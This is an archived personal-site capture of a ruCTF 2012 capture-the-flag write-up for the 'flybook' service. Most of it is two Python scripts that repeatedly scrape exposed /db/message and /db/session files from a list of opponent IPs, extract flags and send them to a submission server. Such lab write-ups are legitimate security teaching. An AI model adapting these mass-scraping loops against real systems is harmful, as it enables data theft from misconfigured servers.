πŸ’Ύ Archived View for airmack.de β€Ί single β€Ί 0d4256aaa01965d0decebdabb050e96af514bc8dd43ce6fc31a84eab6e… captured on 2022-01-08 at 13:38:31. Gemini links have been rewritten to link to archived content

View Raw

More Information

⬅️ Previous capture (2021-12-17)

-=-=-=-=-=-=-


β–‘β–ˆβ–€β–ˆβ–‘β–€β–ˆβ–€β–‘β–ˆβ–€β–„β–‘β–ˆβ–„β–ˆβ–‘β–ˆβ–€β–ˆβ–‘β–ˆβ–€β–€β–‘β–ˆβ–‘β–ˆβ–‘β–‘β–‘β–‘β–ˆβ–€β–„β–‘β–ˆβ–€β–€
β–‘β–ˆβ–€β–ˆβ–‘β–‘β–ˆβ–‘β–‘β–ˆβ–€β–„β–‘β–ˆβ–‘β–ˆβ–‘β–ˆβ–€β–ˆβ–‘β–ˆβ–‘β–‘β–‘β–ˆβ–€β–„β–‘β–‘β–‘β–‘β–ˆβ–‘β–ˆβ–‘β–ˆβ–€β–€
β–‘β–€β–‘β–€β–‘β–€β–€β–€β–‘β–€β–‘β–€β–‘β–€β–‘β–€β–‘β–€β–‘β–€β–‘β–€β–€β–€β–‘β–€β–‘β–€β–‘β–€β–‘β–‘β–€β–€β–‘β–‘β–€β–€β–€


ruCTF 2012(flybook) writeup

Aus der Kategorie Hacking

Begin

The use of .htacces was not correctly configured and so one was able to access the files /db/message , /db/session and /db/? ,/db/message has a flag which is base64 encoded and can be easily decoded

Code


#!/usr/bin/env python
# -*- coding: latin-1 -*-
import base64
import socket
import time
import urllib

from thread import start_new_thread


def johannessub(flag):
  hostname = "192.168.*.*"
  port = 1337
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((hostname, port))
  s.sendall(flag + "\n")
  s.shutdown(socket.SHUT_WR)
  s.close()


def extraktflag(ip):
  submittedflags = []
  try:
    fweb = urllib.urlopen("http://" + ip[:-1] + "/db/message").read()
  except:
    return

  for i in fweb.split("\n"):
    index_begin = i.find("!!44!")
    if index_begin != -1:
      index_begin += len("!!44!")

      flag = i[index_begin : index_begin + 44]
      flag = base64.b64decode(flag)

      breaker = False
      for j in submittedflags:
        if j == flag:
          breaker = True
          break
      if breaker:
        continue
      johannessub(flag)


while True:
  f = open("group_ips.txt", "r")
  while True:
    line = f.readline()
    if line == "\n":
      continue
    if not line:
      break
    start_new_thread(extraktflag, (line,))

  time.sleep(60)


and submitted to the local flag submit service. Nearly the same can be done for the sessions with the following script >>

Code


#!/usr/bin/env python
# -*- coding: latin-1 -*-
import socket
import time
import urllib

from thread import start_new_thread


def johannessub(flag):
  hostname = "192.168.*.*"
  port = 1337
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((hostname, port))
  s.sendall(flag + "\n")
  s.shutdown(socket.SHUT_WR)
  s.close()


def extraktflag(ip):
  submittedflags = []
  try:
    fweb = urllib.urlopen("http://" + ip[:-1] + "/db/session").read()
  except:
    return

  for i in fweb.split("\n"):
    if i[29:31] == "32":
      flag = i[32:64]
      breaker = False
      for j in submittedflags:
        if j == flag:
          breaker = True
          break
      if breaker:
        continue
      johannessub(flag)


while True:
  f = open("group_ips.txt", "r")
  while True:
    line = f.readline()
    if line == "\n":
      continue
    if not line:
      break
    start_new_thread(extraktflag, (line,))

  time.sleep(60)


Final Score: 1086

Latest article

Fix for zfs-dkms-git in arch for kernel 5.15.7 erstellt am 11. December 2021

Project gemini erstellt am 13. Februar 2021

Eat Sleep PWN Repeat erstellt am 07. Dezember 2020

Physico-chemically motivated parameterization and modelling of real-time capable lithium-ion battery models: a case study on the Tesla Model S battery erstellt am 06. Dezember 2020

Breaking out of cisco anyconnect no local network restriction erstellt am 8. April 2018

Insomni Hack 2015(Lost In Memories) writeup erstellt am 23. Maerz 2014

ruCTF 2014(Pidometer) writeup erstellt am 21. Dezember 2014

Footer

Hauptseite

Impressum

Übersicht

Bio